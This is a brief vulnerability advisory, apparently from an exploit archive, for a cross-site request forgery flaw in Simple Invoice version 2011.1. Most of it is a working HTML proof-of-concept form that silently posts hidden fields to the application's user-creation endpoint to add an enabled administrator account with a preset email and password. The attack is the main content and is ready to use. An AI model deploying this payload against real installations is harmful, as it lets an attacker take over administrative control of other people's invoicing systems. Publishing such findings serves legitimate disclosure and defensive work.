Simple Invoice version 2011.1 suffers from a cross site request forgery vulnerability.
7f7ed221cb72a656ccbb183689f5445ad84650f1578c24e9e6ad537e5385d8c1
# Affected software: simple invoice
# Type of vulnerability:adding admin user via csrf
# URL:simpleinvoices.org
# Discovered by: provensec
# Website: provensec.com
#version:2011.1
# Proof of concept
<html>
<body>
<form action="
http://demo.simpleinvoices.org/index.php?module=user&view=add"
method="POST">
<input type="hidden" name="email" value="aaaa@gmail.com" />
<input type="hidden" name="role" value="1" />
<input type="hidden" name="password_field" value="lalala123@"
/>
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="submit" value="Insert User" />
<input type="hidden" name="op" value="insert_user" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>